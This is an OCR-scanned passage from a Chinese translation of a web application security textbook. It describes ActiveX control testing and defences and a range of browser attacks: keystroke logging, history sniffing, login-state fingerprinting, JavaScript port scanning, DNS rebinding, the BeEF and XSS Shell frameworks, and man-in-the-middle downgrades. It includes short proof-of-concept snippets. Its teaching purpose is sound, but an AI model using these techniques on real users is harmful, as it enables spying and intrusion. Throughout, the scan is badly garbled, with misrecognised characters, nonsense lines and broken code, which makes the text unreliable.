有 各 种 工具 可 用 于 枚 举 和 测试 ActiveX 探 件 方法 。iDefense 开 发 的 
COMRaider 就 是 一 个 有 用 的 工具 ， 它 能 够 显示 一 个 控件 的 全 部 方法 ， 
并 对 每 个 方法 执行 基本 的 模糊 测试 ， 如 图 13-7 所 示 。 
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ByVal EditHow AS Boolean 
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图 13-7 COMRaider 显 示 某 个 ActiveX 控 件 的 方法 
13.6.2 防止 ActiveX 漏 润 


保护 本 地 编译 软件 组 件 的 安全 ， 防 止 其 受到 攻击 ， 征 一 个 广泛 而 
复杂 的 话题 ， 这 不 属于 本 书 的 讨论 范围 。 基 本 上 ，ActiveX 控 件 的 设计 
者 与 开发 者 必须 确保 恶意 Web 站 点 无 法 调用 该 控件 实施 的 方法 ， 用 以 
对 安 闭 这 个 控件 的 用 户 执行 恶意 操作 。 以 下 是 一 些 应 该 注意 的 问题 。 

口 应 对 控件 进行 以 安全 为 中 心 的 源 代码 审查 与 渗透 测试 ， 以 确定 
绥 冲 区 淤 出 之 类 的 漏洞 。 

O 控件 不 得 其 露 任何 使 用 用 户 可 控制 的 输入 调用 外 部 文件 系统 或 
操作 系统 、 本 质 上 存在 风险 的 方法 。 只 需 稍 微 做 出 一 些 努力 ， 就 可 以 
找到 更 安全 的 替代 方法 。 例 如 ， 如 采 有 必要 启动 外 部 进程 ， 则 应 编辑 
一 个 列表 ， 列 出 所 有 可 合法 、 安 全 启动 的 外 部 进程 ， 然 后 创建 单独 的 
方法 调用 每 个 进程 ， 或 者 使 用 一 个 方法 提取 这 个 列表 中 的 索引 号 。 


为 进行 深层 防御 ， 一 些 ActiveX 控 件 对 发 布 HTML 页 面 (这 些 控件 
即 从 中 调用 ) 的 域名 进行 确认 。Microsoft 的 “SiteLock 活 动 模板 库 ” 模 板 
允许 开发 者 将 ActiveX 控 件 仅 限 于 特定 的 域名 列表 。 

一 些 控件 甚至 更 进一步 ， 要 求 提 交 给 它们 的 所 有 参数 必须 使 用 加 
密 签 名 。 如 果 提 交 的 签名 无 效 ， 控 件 不 会 执行 请 求 的 操作 。 还 要 注 
意 ， 如 果 人 允许 调用 这 些 控件 的 Web 站 点 存在 任何 XSS 汤 润 ， 那 么 攻击 
者 就 有 可 能 突破 这 类 防御 。 


13.7 ”攻击 浏览 器 


迄今 为 止 ， 我 们 在 这 一 章 和 上 一 章 介 绍 的 攻击 主要 与 利用 应 用 程 
序 的 某 种 行为 特征 攻破 应 用 程序 用 户 有 天。 虽然 某 些 攻击 技巧 需要 利 
用 特定 浏览 絮 的 怪 辛 ， 但 器 站 点 脚本 、 跨 站 点 请 求 仿造 以 及 JavaScript 
支持 之 类 的 攻击 全 都 源 于 特定 web 应 用 程序 中 的 漏洞 。 

另 一 类 针对 用 户 的 攻击 并 不 依赖 于 特定 应 用 程序 的 行为 。 相 反 ，， 
这 些 攻 击 主要 利用 浏览 器 的 行为 特征 ， 或 者 核心 Web 技 术 本 喘 的 设计 
缺陷 。 这 些 攻击 可 能 由 任何 恶意 网 站 或 任何 本 身 己 被 攻破 的 “良性 ”站 
点 实施 。 介 绍 Web 应 用 程序 攻击 的 书籍 通常 都 没有 涉及 这 类 攻击 。 但 
是 ， 我 们 有 必要 简单 了 解 这 些 攻 击 ， 部 分 是 因为 它们 与 利用 应 用 程序 
特定 功能 的 攻击 的 某 些 特点 相同 。 通 过 展示 在 不 存在 任何 应 用 程序 特 
定 漏洞 的 情况 下 ， 攻 击 者 可 以 达到 什么 目的 ， 这 些 攻 击 还 为 我 们 了 解 
各 种 应 用 程序 行为 的 影响 提供 了 相关 信息 。 

以 下 各 部 分 的 介绍 相对 比较 人 简单。 有 关 这 方面 的 主题 ， 可 以 写成 
一 本 书 。 拥 有 大 量 空 余 时 间 的 准 作 者 可 以 同 Wiley 提 交 出 版 The Browser 
Hacker’s Handbook 的 提议 。 


13.7.1 WFE 


JavaScript 可 在 浏览 器 窗口 处 于 激活 状态 时 监控 用 户 按 下 的 所 有 
键 ， 包 括 密码 、 私 人 消息 和 其 他 个 人 信息 。 下 面 的 概念 验证 脚本 将 截 
获 Internet Explorer 中 的 所 有 键 击 ， 并 在 浏览 器 的 状态 栏 中 显示 全 部 内 
容 : 


<script>document.onkeypress = function {) { 
window.status += String. fromCharCcde (window. event .keyCode}; 


</script> 


只 有 当 运 行 上 述 代 码 的 框架 处 于 激活 状态 时 ， 这 些 攻击 才能 捕获 
fii (Ae, URE RS TMA RA SRST) Aa h 
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权 ， 因 为 同 源 策 略 并 不 能 阻止 这 种 操作 。 恶 意 代 码 可 以 通过 处 理 
onkeydown 事 件 来 捕获 键 击 ， 并 且 能 够 将 单独 的 onkeypress 事 件 传 递 给 


顶层 窗口 。 这 样 ， 输 入 的 文本 仍然 会 在 顶层 窗口 中 正常 显示 。 通 过 在 
暂停 输入 时 暂时 放弃 激活 状态 ， 恶 意 代 码 甚至 可 以 在 顶层 窗口 内 的 正 
党 位置 保留 显示 内 烁 的 光标 。 


13.7.2 浏览 器 历史 记录 与 搜索 查 i 


JavaScript 可 用 于 实施 宣 力 攻击 ， 查 明 用 户 最 近 访 问 的 第 三 方 站 皮 
以 及 他 们 在 常用 搜索 引擎 上 执行 的 查询 。 在 介绍 蛋 力 攻击 (实施 此 攻 
击 的 目的 ， 是 为 了 确定 可 在 其 他 域 上 使 用 的 有 效 反 CSRF 令 脾 ) 时， 我 
们 已 经 讨论 了 这 种 技巧 。 攻 击 者 可 以 动态 创建 第 用 Web 站 点 以 及 搜索 
查询 的 超 链接 ， 并 使 用 getComputedStyle API 检 查 这 些 链 接 是 否 以 彩色 
标记 为 “已 被 访问 ”， 从 而 完成 这 项 任务 。 而 且 ， 攻 击 者 可 以 迅速 检查 
大 量 可 能 的 目标 ， 而 不 会 给 用 户 造 成 很 大 的 影响 。 


13.7.3 吾 当 前 使 用 的 应 用 程序 


JavaScript 可 用 于 确定 用 户 当前 是 否 登录 到 第 三 方 Web 应 用 程序 。 
大 多 数 应 用 程序 都 包含 只 有 登录 用 户 可 查看 的 页 面 ， 如 “用 户 资 料 ” 页 
面 。 如 果 未 通过 验证 的 用 户 请 求 这 个 页 面 ， 将 会 收 到 错误 请 已， 或 着 
一 个 转向 登录 页 面 的 重 定 问 链 接 。 


程序 来 处 理 脚 本 错误 ， 种 行为 可 确定 用 户 十 否 已 经 登录 第 三 方 Web 应 
用 程序 : 


window.onerror = fingerprint; 


<script src="https://other-app.com/MyDetails.aspx"></script> 


当然 ， 无 论 受 保护 的 页 面 处 于 什么 状态 ， 由 于 它 仅 包 侣 HTML 内 
容 ， 因 此 这 时 将 会 出 现 一 个 JavaScript 错 误 。 重 要 的 是 ， 根 据 实际 返回 
的 HTML 文 档 ， 该 错误 将 包含 不 同 的 行 号 与 错误 类 型 。 接 下 来 ， 攻 击 
者 可 以 运行 错误 处 理 程序 (fingerprint) ， 检 查 用 户 登 录 时 产 
生 的 行 号 与 错误 类 型 。 尽 管 应 用 程序 实施 了 同 源 策 略 ， 但 攻击 者 的 脚 
本 仍然 能 够 推断 出 受 保护 页 面 的 状态 。 

确定 用 户 当 前 登录 哪些 第 用 的 第 三 方 应 用 程序 后 ， 攻 击 者 就 可 以 
执行 针对 性 极 强 的 路 站 点 请 求 伪 造 攻击 ， 以 被 攻破 的 用 户 身 份 在 应 用 
程序 中 执行 任意 操作 ° 


13.7.4 ”端口 扫描 


JavaScript 可 对 用 户 本 地 网 络 或 其 他 可 访问 的 网 络 上 的 主机 进行 端 
口 扫 朱 ， 以 确定 可 被 利用 的 服务 。 如 果 用 户 受到 企业 或 家 庭 防火 墙 的 
保护 ， 攻 击 者 将 能 够 到 达 无 法 通过 公共 互联 网 访问 的 服务 。 如 果 攻 击 
A 
/ H 6 

基于 浏览 器 的 端口 扫描 可 使 用 Java applet 确 定 用 户 的 IP 地 址 (可 能 
进行 了 网 络 地 址 转换 ) ， 从 而 推断 出 本 地 网 络 的 了 范围。 然后 ， 脚 本 
演 试 与 任意 主机 和 端口 建立 连接 ， 以 测试 连通 性 。 如 前 所 述 ， 同 源 寅 
略 阻 止 脚本 处 理 这 些 请 求 的 啊 应 。 但 是 ， 在 检测 登录 状态 时 使 用 的 相 
似 技 巧 也 可 用 于 测试 网 络 连通 性 。 这 时 ， 攻 击 考 的 脚本 尝试 从 每 个 日 
标 主机 和 端口 动态 加 载 并 执行 一 段 脚本 。 如 果 那 个 端口 上 有 Web 服 务 
铬 下 在 运行 ， 它 将 返回 HTML 或 其 他 一 些 内 容 ， 生 成 端口 扫描 脚本 能 
够 检测 到 的 JavaScript 错 误 。 否 则 ， 连 接 尝 试 将 会 超时 或 不 返回 任何 数 
据 ， 在 这 种 情况 下 不 会 导致 错误 。 因 此 ， 尽 管 应 用 程序 实施 同 源 限 
制 ， 端 口 扫 拉 脚本 仍然 能 够 确定 任意 主机 和 端口 的 连通 性 。 

请 注意 ， 大 多 数 浏 览 器 都 在 可 以 使 用 HTTP 访 问 的 端口 上 实施 了 限 
制 ， 并 阻止 了 其 他 主要 服务 常用 的 端口 (如 用 于 SMTP 的 端口 25) ° 
但 是 ， 通 过 利用 相关 漏洞 ， 可 以 突破 这 些 浏览 器 实施 的 限制 。 


13.7.5 ”攻击 其 他 网 络 主机 


成 功 使 用 端口 扫描 确 定 其 他 主机 后 ， 束 可 以 使 用 一 段 恶 意 脚 本 艾 
试 标识 每 一 个 发 现 的 服务 ， 然 后 通过 各 种 方法 实施 攻击 。 

许多 Web 服 务 器 包含 位 于 特殊 URL 位 置 的 图 像 文件 。 下 面 的 代码 
仿 查 一 幅 与 一 系列 常用 DSL 路 由 器 有 关 的 图 像 : 


8.1.1/hm_icon.gif" onerror="notNetcear{)"> 
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漏洞 ， 或 执行 请 求 伪 造 攻击 ， 继 续 攻 击 Web 服 务 嚣 。 在 本 示例 中 ， 攻 
击 者 可 以 尝试 使 用 默认 证 书 登 录 路 由 器 ， 并 对 路 由 器 进行 重新 配置 ， 
以 打开 其 外 部 接口 上 的 其 他 端口 ， 或 同 外 界 披露 它 的 管理 功能 。 注 


意 ， 许 多 这 种 非常 有 效 的 攻击 只 需要 提出 任意 请 求 ， 而 不 需要 处 理 它 
们 的 响应 ， 因 此 不 会 受到 同 源 策略 的 限制 。 

在 某 些 情况 下 ， 攻 击 者 可 以 利用 DNS 重新 绑 定 (DNS rebinding) 
技巧 违反 同 源 策略 ， 从 本 地 网 络 中 的 Web 服 务 器 中 检索 内 容 。 这 些 攻 
击 将 在 本 章 后 面 讨 论 。 


13.7.6_ 利 用 非 HTTP 服 务 


除 针 对 Web 服 务 絮 实施 攻击 外 ， 有 些 情况 下 还 可 以 利用 用 户 的 浏 
览 右 、 针 对 可 以 从 用 户 的 计算 机 访问 的 非 HTTP 服 务实 施 攻击 。 只 有 所 
攻击 的 服务 接受 必然 会 在 每 个 请 求 的 开头 出 现 的 HTTP 消息 头 ， 攻 击 者 
就 可 以 在 消息 主体 中 发 送 任意 二 进 制 内 容 ， 从 而 与 非 HITP 服 务 进行 交 
互 。 实 际 上 ， 许 多 网 络 服务 都 接受 无 法 识别 的 输入 ， 并 仍然 处 理 随后 
针对 相关 协议 而 构造 的 输入 。 

我 们 已 在 第 12 章 介绍 了 一 种 跨 域 发 送 任意 消息 主体 的 技巧 ， 该 技 
巧 使 用 HTML 表 单 (其 enctype 属 性 设置 为 text/plain) 问 易 受 攻 击 的 应 
用 程序 发 送 XML 内 容 。 下 面 的 论文 介绍 了 实施 这 类 攻击 的 其 他 技巧 : 

www.ngssoftware.com/research/papers/InterProtocolExploitation.pdf 

这 类 协议 间 攻 击 可 对 目标 服务 实施 未 授权 操作 ， 或 利用 该 服务 内 
的 代码 级 漏洞 来 攻破 日 标 服务 癸 。 

此 外 ， 在 某 些 情况 下 ， 还 可 以 对 非 HTTP 服 务 行为 加 以 利用 ， 和 针对 
在 同一 服务 右上 运行 的 Web 应 用 程序 实施 XSS 攻 击 。 要 实施 这 种 攻 
击 ， 必 须 满 足以 下 条 件 。 
人 
wt) o 

口 非 HTTP 必 须 接受 浏览 器 发 送 的 意外 HTTP 消 恩 涉 ， 而 不 仅仅 是 
在 出 现 这 种 情况 时 关闭 网 络 连接 。 许 多 服务 都 接受 意外 HTTP 消息 头 ， 
寺 别 是 那些 基于 文本 的 服务 。 | 
P A 非 HITP 服 务必 须 在 其 响应 中 (如 在 错误 消息 中 ) 回 显 一 部 分 请 

口 浏览 器 必须 接受 不 包含 有 效 HTTP 消 息 头 的 响应 ， 并 且 必 须 将 一 
部 分 啊 应 作为 HTML 处 理 CAFRA HTML) 。 实 际 上 ， 在 收 
到 合适 的 非 HTTP 啊 应 时 ， 所 有 最 新 版 本 的 浏览 絮 都 以 这 种 方式 进行 处 
理 《可 能 是 为 了 向 后 兼容 ) 。 

口 在 隔离 域 源 访问 cookie 时 ， 浏 充 硕 必须 名 上 略 端口 号 。 确 实 ， 在 
处 理 cookie 时 ， 当 前 浏览 吉 会 忽略 端口 。 


如 果 满 足 这 些 条 件 ， 攻 击 者 就 可 以 构建 针对 非 HTTP 服 务 的 XSS 攻 
击 。 要 实施 这 种 攻击 ， 需 要 以 正常 方式 在 URL 或 消 轧 主体 中 发 送 专 门 
设计 的 请 求 。 人 然后， 请求 中 包含 的 脚本 代码 将 被 回 显 ， 并 在 用 户 的 浏 
览 器 中 执行 。 该 代码 可 以 从 非 HTTP 服 务 所 在 的 域 中 读 取 用 户 的 
cookie， 然 后 将 这 些 cookie 传 送 给 攻击 者 。 


13.7.7 利用 浏览 器 漏洞 


如 有 果 用 户 的 浏览 器 或 任何 安 流 的 扩展 存在 漏洞 ， 攻 击 者 整 可 以 通 
过 恶意 JavaScript 或 HIML 代 码 利用 这 些 漏洞 。 某 些 情况 下 ， 攻 击 者 可 
以 利用 Java 虚 拟 机 之 类 的 扩展 中 的 漏洞 、 与 本 地 计算 机 或 其 他 位 置 上 
的 非 HTTP 服 务 进行 双 同 二 进 制 通信 。 这 样 ， 攻 击 者 殉 可 以 利用 通过 端 
口 扫描 确定 的 存在 于 其 他 服务 中 的 漏洞 。 许 多 软件 产品 (包括 并 非 基 
TARAI m) 还 安装 了 可 能 包含 漏洞 的 ActiveX 探 件 。 


13.7.8 DNS 重新 绑 定 


DNS 重新 绑 定 (DNS rebinding) 是 一 种 在 某 些 情况 下 可 部 分 违反 
同 源 策略 ， 从 而 允许 恶意 Web 站 点 与 其 他 域 进行 交互 的 技术 。 之 所 以 
能 够 实施 这 种 攻击 ， 是 因为 同 源 策略 主要 基于 域名 进行 隔离 ， 而 最 终 
传送 HTTP 请 求 则 需要 将 域名 转换 为 I1P 地 址 。 

整体 看 来 ， 这 种 攻击 的 过 程 如 下 。 

g 用户 访问 攻击 者 域 上 的 恶意 Web 页 面 。 为 检索 此 页 面 ， 用 户 的 
浏览 器 会 将 攻击 者 的 域名 解析 为 攻击 者 的 IP 地 址 。 

口 攻击 者 的 Web 页 面向 攻击 者 的 域 提出 Ajax 请 求 〈 同 源 策 略 允 许 
这 种 行为 ) 。 攻 击 者 利用 DNS 重新 绑 定 确保 浏览 器 再 次 解析 攻击 者 的 
域 ， 在 这 次 解析 过 程 中 ， 域 名 将 解析 为 攻击 者 所 针对 的 第 三 方 应 用 程 
序 的 IP 地 址 。 

口 随后 针对 攻击 者 的 域名 提出 的 请 求 将 被 发 送 到 目标 应 用 程序 。 
由 于 这 些 请 求 与 攻击 者 的 原始 页 面 在 同一 个 域 上 ， 因 此 ， 同 源 策 略 允 
许 攻击 者 的 代码 检索 目标 应 用 程序 返回 的 请 求 的 内 容 ， 并 将 这 些 内 容 
返还 给 攻击 者 (可 能 位 于 受 其 控制 的 其 他 域 上 ) 。 

实施 这 种 攻击 将 面临 各 种 阻碍 ， 包 括 一 些 浏览 器 为 继续 使 用 以 前 
解析 的 IP 地 址 “即使 域 已 被 重新 绑 定 到 其 他 地 址 ) 而 采用 的 机 制 。 此 
Sh, 浏览 器 发 送 的 Host 消 息 头 仍然 会 引用 攻击 者 的 域 ， 而 不 是 可 能 会 
导致 问题 的 目标 应 用 程序 的 域 。 之 前 ， 攻 击 者 可 以 利用 一 些 方法 在 各 


种 浏 咒 咒 上 突破 这 些 阻碍 。 除 浏览 絮 外 ， 还 可 以 针对 浏览 器 扩展 和 
Web 代 理 实施 DNS 重新 绑 定 攻击 ， 不 过 浏览 万 扩 展 和 Web 代 理 的 运行 
机 制 可 能 会 有 所 不 同 。 

请 注意 ， 在 DNS 重新 绑 定 攻击 中 ， 驳 浏览 郁 而 言 ， 针 对 目标 应 用 
程序 的 请 求 仍然 在 攻击 者 的 域 中 提出 。 因 此 ， 这 些 请 求 中 不 会 包含 目 
标 应 用 程序 所 在 的 域 的 任何 cookie。 为 此 ， 攻 击 者 可 以 通过 DNS 重新 
绑 定 从 目标 应 用 程序 检索 到 的 内 容 ， 与 任何 可 以 直接 回 目 标 应 用 程序 
提出 请 求 的 用 户 能 够 检索 到 的 内 容 相 同 。 因 此 ， 这 种 技巧 在 目标 应 用 
程序 已 实施 了 其 他 控制 来 防止 攻击 者 直接 与 其 进行 交互 的 情况 下 尤其 
有 用 。 例 如 ， 如 采用 户 处 在 无 法 通过 互联 网 直接 访问 的 组 织 内 部 网 络 
中 ， 攻 击 者 可 以 诱 使 该 用 户 从 所 在 网 络 的 其 他 系统 中 检索 内 容 ， 并 将 
这 些 内 容 传送 给 攻击 者 。 


13.7.9 ”浏览 器 利用 框架 


人 们 已 开发 出 各 种 框架 ， 用 以 演示 和 利用 各 种 针对 因特网 终端 用 
户 的 攻击 。 这 些 框架 通常 需要 通过 某 种 漏洞 (如 XSS) ， 在 受害 者 的 
A bias PRCA —NavaScript?J (hook) 。 放 置 钧 子 后 ， 浏 览 器 就 会 
与 攻击 者 控制 的 服务 器 建立 联系 。 浏 贤 器 会 定期 访问 这 个 服务 器 ， 问 
DOE APES 同时 提供 一 个 控制 信道 ， 方 便 接收 攻击 者 发 出 的 命 


A> 


TZ 注解 尽管 同 源 策略 实施 了 各 种 限制 ， 但 在 这 种 情况 下 ， 


攻击 者 仍然 可 以 利用 各 种 技巧 、 通 过 已 注入 到 目标 应 用 程序 中 的 脚 
本 与 其 控制 的 服务 器 进行 双向 异步 交互 。 一 种 简单 的 方法 是 对 自己 


的 域 实施 动态 跨 域 脚本 包含 。 这 些 请 求 能 够 向 攻击 者 提交 截获 的 数 
据 〈 在 URL 碍 询 字符 串 中 ) ， 并 接收 有 关 应 执行 的 操作 的 指令 (在 
返回 的 脚本 代码 中 ) 。 


以 下 是 可 以 在 这 种 类 型 的 框架 中 执行 的 一 些 操 作 : 

口 记 隶 键 击 并 问 攻 击 者 发 送 这 些 内 容 ; 

口 支持 用 户 访 问 易 受 攻击 的 应 用 程序 的 会 话 ; 

口 “ 指 纹 ” 识 别 受害 者 的 浏览 右 ， 从 而 利用 已 知 的 浏览 套 漏 洞 ; 


口 对 其 他 主机 〈 位 于 被 攻破 的 用 户 浏览 器 能 够 访问 的 私有 网 络 
中 ) 进行 端口 扫描 ， 并 癌 攻 击 者 传送 扫描 结果 ; 

口 通过 据 使 浏览 絮 发 送 恶 意 请 求 ， 可 对 借助 被 攻破 的 用 户 浏 览 絮 
访问 的 其 他 Web 应 用 程序 实施 攻击 ; 
Py 口 对 用 户 的 浏览 历史 记录 实施 蛮 力 攻击 ， 并 将 结果 送 交 给 攻击 


BeEF 征 一 个 与 型 的 综合 型 i Seas Pl FEE, E Wade Alcon 开 
发 ， 能 够 执行 上 述 功 能 。 图 13-8 说 明了 BeEF 如 何 截 取 一 名 被 攻破 用 户 
的 信息 时 ， 包 括 计算 机 的 相关 资料 、 当 前 显示 的 URE 与 页 面 内 容 ， 以 及 
用 户 输入 的 键 击 。 
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Details 
Browser 
Internet Explorer 5.01 
Operating System 
Windows 98 
Screen 
1280x800 with 24-bit colour 
URL 
http://localhost/beef/hook/xss-example. htm 
Cookie 
BeEFSession=99f42a3792c31c94f85387a4d360a618 


Page Content 
Content 
The main page more contert 


Key Logger 
Keys 
my keys are logged 


Module Results 
Results 
OK Clicked 


图 13-8 ”利用 BeEF 从 一 名 被 攻破 的 用 户 截取 的 数据 


13-9 显 示 BeEF 正 对 受害 用 户 的 计算 机 进行 端口 扫描 。 
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图 13-9 ”BeEF 正 对 一 名 被 攻破 的 用 户 计算 机 进行 端口 扫描 


XSS Shell 是 另外 一 个 功能 非常 强大 的 浏 顺 屡 利 用 框架 ， 它 由 
Ferrruh Mavituna 开 发 。 这 个 框架 提供 一 系列 功能 ， 可 控制 通过 XSS 攻 
破 的 僵尸 主机 (zombie host) ， 包 括 截获 键 击 、 剪 贴 板 内 容 、 鼠 标 移 
动 、 屏 幕 截 图 、URL 历 史记 录 ， 以 及 注入 任意 JavaScript 命 令 。 即 使 导 
般 到 应 用 程序 的 其 他 页 面 ， 它 还 会 驻 留 在 用 户 的 浏览 右 中 。 


13.7.10 ”中间人 攻击 


我 们 在 前 几 章 中 讲 到 ， 如 采 应 用 程序 使 用 未 加 密 HTTP 通 信 ， 则 位 
于 适当 位 置 的 攻击 者 可 以 通过 各 种 方式 拦截 敏感 数据 ， 如 密码 和 会 话 
令 牌 。 更 令 人 惊奇 的 是 ， 即 使 应 用 程序 使 用 HTTPS 传 输 所 有 敏感 数 
据 ， 并 且 目 标 用 户 始终 验证 是 否 正 确 使 用 了 HTTPS， 攻 击 者 仍然 能 够 
实施 一 些 普 重 的 攻击 。 

这 类 攻击 称 为 “中间 人 ”攻击 。 这 类 攻击 者 不 只 是 被 动 监视 其 他 用 
户 的 流量 ， 而 且 会 动态 更 改 某 些 流量 。 这 类 攻击 往往 更 加 复杂 ， 但 确 
实 可 以 在 各 种 常见 的 情形 (包括 无 线 公共 热点 和 共享 的 办 公 网 络 ) 中 
实施 。 

许多 应 用 程序 使 用 HTTP 传 输 非 敏感 数据 ， 如 产品 说 明和 帮助 页 
面 。 如 果 这 些 内 容 使 用 绝对 URL 实 现任 何 脚 本 包含 ， 攻 击 者 就 可 以 利 
用 主动 中 间 人 攻击 攻破 同一 域 上 受 HTTPS 保 护 的 请 求 。 例 如 ， 某 应 用 
程序 的 帮助 页 面 可 能 包含 以 下 代码 : 


<script src="http://wahh-app.com/help. js"></script> 


目前 ， 许 多 知名 Web 应 用 程序 都 采用 这 种 行为 ， 即 使 用 绝对 URL 
包含 通过 HTTP 传 送 的 脚本 。 在 这 种 情况 下 ， 活 路 的 中 间 人 攻击 者 当然 
可 以 通过 修改 任何 HTTP 啊 应 来 执行 任意 脚本 代码 。 但 是 ， 由 于 同 源 策 
略 通常 会 将 通过 HTTP 和 HTTPS 加 载 的 内 容 视 为 属于 不 同 来 源 ， 攻 击 
者 并 不 能 利用 这 种 攻击 截获 使 用 HTTPS 访 问 的 内 容 。 

为 克服 这 种 障碍 ， 攻 击 者 可 以 通过 修改 任何 HTTP 啊 应 来 构建 重 定 
品 ， 或 在 其 他 啊 应 中 重 写 链接 目标 ， 从 而 诱 使 用 户 通 过 HTTPS 加 载 同 
一 页 面 。 当 用 户 通过 HTTPS 加 载 帮助 页 面 时 ， 其 浏览 器 将 使 用 HTTP 
执行 指定 的 脚本 包含 。 令 人 遗憾 的 是 ， 一 些 浏 览 器 在 这 种 情况 下 并 不 
显示 任何 警告 。 然 后 ， 攻 击 者 可 以 在 包含 脚本 的 啊 应 中 返回 任意 脚本 
代码 i 中 执行 ， 人 允许 攻击 者 截获 通过 HTTPS 访 
问 的 所 有 内 容 。 

即使 所 攻击 的 应 用 程序 并 不 使 用 普通 HTTP 传 送 任何 内 容 ， 但 攻击 
者 仍然 可 以 通过 向 任何 其 他 域 提出 HTTP 请 求 来 返回 重 定向 ， 从 而 诱 使 
用 户 使 用 普通 HTTP 辐 目标 域 提 出 请 求 。 虽 然 应 用 程序 本 吴 可 能 不 会 监 
听 端 口 80 上 的 HTTP 请 求 ， 但 攻击 者 可 以 拦截 这 些 诱发 的 请 求 ， 并 在 这 
些 请 求 的 响应 中 返回 任意 内 容 。 在 这 种 情况 下 ， 攻 击 者 可 以 采用 各 种 
技巧 来 攻击 应 用 程序 域 的 HTTPS 来 源 。 

口 首 先 ， 如 介绍 cookie 动 持 攻击 时 所 述 ， 攻 击 者 可 以 使 用 通过 普 
通 HTTP 传 送 的 响应 来 设置 或 更 新 HTTPS 请 求 使 用 的 cookie 值 。 即 使 
cookie 最 初 通过 HTTPS 设 置 并 被 标记 为 安全 ， 攻 击 者 仍然 可 以 这 样 
做 。 如 果 有 任何 cookie 值 由 在 HTTPS 来 源 中 运行 的 脚本 代码 以 危险 的 
方式 进行 处 理 ， 攻 击 者 就 可 以 利用 cookie 注 入 攻击 、 通 过 该 cookie 来 实 
施 XSS 攻 击 。 

口 其 次 ， 我 们 在 前 面 讲 到 ， 一 些 浏览 器 扩展 并 不 能 正确 隔离 通过 
HTTP 和 HTTPS 加 载 的 内 容 ， 并 将 这 些 内 容 视 为 属于 同一 来 源 。 这 
上 时， 攻击 者 的 脚本 (由 诱发 的 HTTP 请 求 的 响应 返回 ) 就 可 以 利用 此 类 
扩展 来 读 取 或 写 入 用 户 使 用 HTTPS 访 问 的 页 面 的 内 容 。 

要 实施 上 述 攻 击 ， 需 要 通过 某 种 方法 ， 如 从 用 户 癌 任何 其 他 域 提 
出 的 HITP 请 求 返回 重 定 回 啊 应 ， 诱 使 用 户 辐 目标 域 提 出 任意 HTTP 请 
求 。 你 可 能 认为 极为 注重 安全 的 用 户 并 不 会 受到 上 述 攻 击 。 假 设 用 户 
一 次 仅 访问 一 个 Web 站 点 ， 并 在 访问 每 个 新 站 点 之 前 重新 启动 浏览 
句 。 假 设 他 使 用 全 新 的 浏览 器 登录 自己 的 银行 应 用 程序 ， 并 且 该 程序 
仅 使 用 HTTPS 传 输 数 据 。 他 是 否 会 受到 中 间 人 攻击 呢 ? 


令 人 担心 的 是 答案 是 肯定 的 ， 他 可 能 会 受到 攻击 。 今 天 的 浏览 器 
会 在 后 台 提 出 各 种 普通 HTTP 请 求 ， 而 不 论 用 户 访问 哪 一 个 域 。 常见 的 
例子 包括 反 钓鱼 列表 、 版 本 ping 以 及 针对 RSS 源 的 请 求 。 这 时 ， 攻 击 
者 可 以 通过 HTTP， 用 指 问 目标 域 的 重 定 癌 来 啊 应 其 中 的 任何 请 求 。 如 
果 浏 蜗 絮 直接 访问 该 重 定 同 ， 攻 击 者 就 可 以 实施 上 述 某 种 攻击 ， 首 先 
攻破 目标 域 的 HTTP 来 源 ， 然 后 将 攻击 扩展 到 HTTPS 来 源 。 

注重 安全 的 用 户 如 果 需 要 通过 不 可 信和 网 络 访问 受 HTTPS 保 护 的 敏 
感 内 容 ， 可 以 将 浏览 器 的 代理 配置 设置 为 “对 除 HTTPS 以 外 的 所 有 协议 
使 用 无 效 的 本 地 端口 ”>， 从 而 在 一 定 程度 上 阻止 上 述 攻 击 。 即 使 这 样 
fk, 他 们 仍然 需要 当心 针对 SSL 的 主动 击 (该 主题 不 属于 本 书 的 讨 
论 苑 围 ) 。 


13.8 小结 


我 们 已 经 分 析 了 各 种 情形 ， 说 明了 Web 应 用 程序 中 存在 的 漏洞 古 
如 何 令 它 的 用 户 遭 受 恶 意 攻击 的 。 许 多 这 种 漏洞 都 非常 难以 理解 和 发 
现 ， 而 且 在 这 个 过 程 中 往往 需要 进行 大 量 的 调查 ， 为 此 付出 的 努力 超 
出 了 它们 作为 某 个 重要 攻击 的 前 提 的 实际 意义 。 然 而 ， 严 重 的 漏洞 党 
党 隐藏 在 大 量 无 关 紧 要 的 客户 端 缺 陷 之 中 ， 而 攻击 者 则 可 以 利用 这 类 
汤 洞 对 应 用 程序 实施 攻击 。 因 此 ， 许 多 时 候 ， 付 出 这 样 的 努力 还 是 值 
得 的 。 

而 且 ， 随 着 人 们 对 Web 应 用 程序 安全 意识 的 逐渐 增强 ， 直 接 针对 
服务 器 组 件 的 攻击 可 能 更 难以 发 现 或 实施 。 但 是 ， 针 对 其 他 用 户 的 攻 
击 ， 无 论 其 结 采 好 坏 ， 肯 定 会 成 为 每 个 人 将 来 必须 面 对 的 问题 。 


13.9 问题 


欲 知 问题 答案 ， 请 访问 http://mdsec.net/wahh ° 
(1) 已 知 一 项 应 用 程序 功能 将 一 个 查询 字符 串 参 数 的 内 容 插入 到 
某 个 HTTP 重 定 同 的 Location 消 息 头 中 。 利 用 这 种 行为 ， 攻 击 者 可 以 实 
施 哪 3 种 不 同类 型 的 攻击 ? 
(2) 要 针对 应 用 程序 的 一 项 敏感 功能 实施 CSRF 攻 击 ， 必 须 满 足 
什么 前 提 条 件 ? 
(3) 哪 3 种 防御 措施 可 用 于 防止 JSON 支 持 攻击 ? 
(4) 对 于 以 下 每 一 种 技术 ， 确 定 该 技术 请 求 /crossdomain.xmlIE 
确实 施 域 隔离 的 任何 情形 : 
(a) Flash 
(b) Java 
(c) HTML5 
(d) Silverlight 
(5) “我 们 不 会 受到 单 击 劫持 攻击 ， 因 为 我 们 不 使 用 框架 。” 以 上 
表 壕 是 否 正 确 ， 为 什么 ? 
(6) 已 知 在 某 应 用 程序 使 用 的 昵称 中 存在 一 个 永久 性 XSS 漏 洞 。 
此 字符 串 仅 在 配置 它 的 用 户 登 录 应 用 程序 时 癌 该 用 户 显 示 。 请 摘 述 用 
于 攻破 该 应 用 程序 的 其 他 用 户 的 攻击 所 需 执 行 的 步骤 。 
y (7) 如 何 测试 应 用 程序 是 否 人 允许 使 用 XMLHttpRequest 提 出 跨 域 
请 求 ? 
(8) 请 描述 攻击 者 可 诱 使 受害 者 使 用 任意 cookie 的 3 种 方法 。 


第 14 章 
定制 攻击 自动 化 


本 章 不 再 介绍 任何 新 的 漏洞 ， 而 是 分 析 向 Web 应 用 程序 实施 攻击 
